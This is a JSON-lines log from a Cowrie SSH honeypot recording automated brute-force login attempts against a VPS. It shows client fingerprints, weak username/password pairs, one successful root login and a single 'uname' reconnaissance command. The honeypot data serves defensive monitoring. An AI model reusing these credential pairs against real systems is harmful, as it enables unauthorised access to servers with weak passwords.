{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:18:53.126651Z","src_ip":"41.226.27.251","session":"887a8f8f9718"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:18:54.396451Z","src_ip":"41.226.27.251","session":"887a8f8f9718"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1790d04f5b3","protocol":"ssh","message":"New connection: 212.227.235.229:48812 (1.2.3.4:22) [session: b1790d04f5b3]","sensor":"my-vps","timestamp":"2025-08-31T02:18:59.002373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:18:59.763512Z","src_ip":"212.227.235.229","session":"b1790d04f5b3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:18:59.764172Z","src_ip":"212.227.235.229","session":"b1790d04f5b3"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"1234567","message":"login attempt [elasticsearch/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:19:05.798057Z","src_ip":"212.227.235.229","session":"b1790d04f5b3"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:19:07.571153Z","src_ip":"212.227.235.229","session":"b1790d04f5b3"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":37512,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6d7e0fed4f1","protocol":"ssh","message":"New connection: 41.226.27.251:37512 (1.2.3.4:22) [session: b6d7e0fed4f1]","sensor":"my-vps","timestamp":"2025-08-31T02:19:13.182932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:19:13.183977Z","src_ip":"41.226.27.251","session":"b6d7e0fed4f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:19:13.229296Z","src_ip":"41.226.27.251","session":"b6d7e0fed4f1"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-31T02:19:13.366505Z","src_ip":"41.226.27.251","session":"b6d7e0fed4f1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:19:14.627263Z","src_ip":"41.226.27.251","session":"b6d7e0fed4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39804,"dst_ip":"1.2.3.4","dst_port":22,"session":"82f24b056873","protocol":"ssh","message":"New connection: 212.227.125.160:39804 (1.2.3.4:22) [session: 82f24b056873]","sensor":"my-vps","timestamp":"2025-08-31T02:19:20.416121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:19:20.892447Z","src_ip":"212.227.125.160","session":"82f24b056873"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:19:20.893126Z","src_ip":"212.227.125.160","session":"82f24b056873"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"1234567","message":"login attempt [elasticsearch/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T02:19:23.755601Z","src_ip":"212.227.125.160","session":"82f24b056873"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:19:25.643049Z","src_ip":"212.227.125.160","session":"82f24b056873"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59394,"dst_ip":"1.2.3.4","dst_port":22,"session":"55b8c5a119d2","protocol":"ssh","message":"New connection: 41.226.27.251:59394 (1.2.3.4:22) [session: 55b8c5a119d2]","sensor":"my-vps","timestamp":"2025-08-31T02:19:33.560894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:19:33.562103Z","src_ip":"41.226.27.251","session":"55b8c5a119d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:19:33.612700Z","src_ip":"41.226.27.251","session":"55b8c5a119d2"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T02:19:33.766197Z","src_ip":"41.226.27.251","session":"55b8c5a119d2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:19:35.036642Z","src_ip":"41.226.27.251","session":"55b8c5a119d2"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59558,"dst_ip":"1.2.3.4","dst_port":22,"session":"32b3d30ca0cb","protocol":"ssh","message":"New connection: 41.226.27.251:59558 (1.2.3.4:22) [session: 32b3d30ca0cb]","sensor":"my-vps","timestamp":"2025-08-31T02:19:53.756126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:19:53.853215Z","src_ip":"41.226.27.251","session":"32b3d30ca0cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:19:53.854335Z","src_ip":"41.226.27.251","session":"32b3d30ca0cb"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-31T02:19:54.039420Z","src_ip":"41.226.27.251","session":"32b3d30ca0cb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:19:55.408187Z","src_ip":"41.226.27.251","session":"32b3d30ca0cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59330,"dst_ip":"1.2.3.4","dst_port":22,"session":"93ba96a1d84d","protocol":"ssh","message":"New connection: 212.227.235.229:59330 (1.2.3.4:22) [session: 93ba96a1d84d]","sensor":"my-vps","timestamp":"2025-08-31T02:19:58.264167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:19:59.015583Z","src_ip":"212.227.235.229","session":"93ba96a1d84d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:19:59.016349Z","src_ip":"212.227.235.229","session":"93ba96a1d84d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42916,"dst_ip":"1.2.3.4","dst_port":22,"session":"27d48733be24","protocol":"ssh","message":"New connection: 212.227.235.229:42916 (1.2.3.4:22) [session: 27d48733be24]","sensor":"my-vps","timestamp":"2025-08-31T02:20:04.951428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:04.957384Z","src_ip":"212.227.235.229","session":"27d48733be24"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:20:05.040721Z","src_ip":"212.227.235.229","session":"27d48733be24"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"12345678","message":"login attempt [elasticsearch/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:05.095921Z","src_ip":"212.227.235.229","session":"93ba96a1d84d"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:06.955518Z","src_ip":"212.227.235.229","session":"93ba96a1d84d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:12.957719Z","src_ip":"212.227.235.229","session":"27d48733be24"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44868,"dst_ip":"1.2.3.4","dst_port":22,"session":"787624a01f2e","protocol":"ssh","message":"New connection: 41.226.27.251:44868 (1.2.3.4:22) [session: 787624a01f2e]","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.390381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.391423Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.436470Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.574477Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:20:14.683156Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.683873Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.729671Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:14.730760Z","src_ip":"41.226.27.251","session":"787624a01f2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49902,"dst_ip":"1.2.3.4","dst_port":22,"session":"86aa3378bd4f","protocol":"ssh","message":"New connection: 212.227.125.160:49902 (1.2.3.4:22) [session: 86aa3378bd4f]","sensor":"my-vps","timestamp":"2025-08-31T02:20:19.639603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:20:20.393941Z","src_ip":"212.227.125.160","session":"86aa3378bd4f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:20:20.394723Z","src_ip":"212.227.125.160","session":"86aa3378bd4f"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"12345678","message":"login attempt [elasticsearch/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:20:23.037514Z","src_ip":"212.227.125.160","session":"86aa3378bd4f"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:20:24.650286Z","src_ip":"212.227.125.160","session":"86aa3378bd4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47151,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e9e9d9fb89f","protocol":"ssh","message":"New connection: 212.227.125.160:47151 (1.2.3.4:22) [session: 4e9e9d9fb89f]","sensor":"my-vps","timestamp":"2025-08-31T02:20:24.746072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:20:27.240920Z","src_ip":"212.227.125.160","session":"4e9e9d9fb89f"}
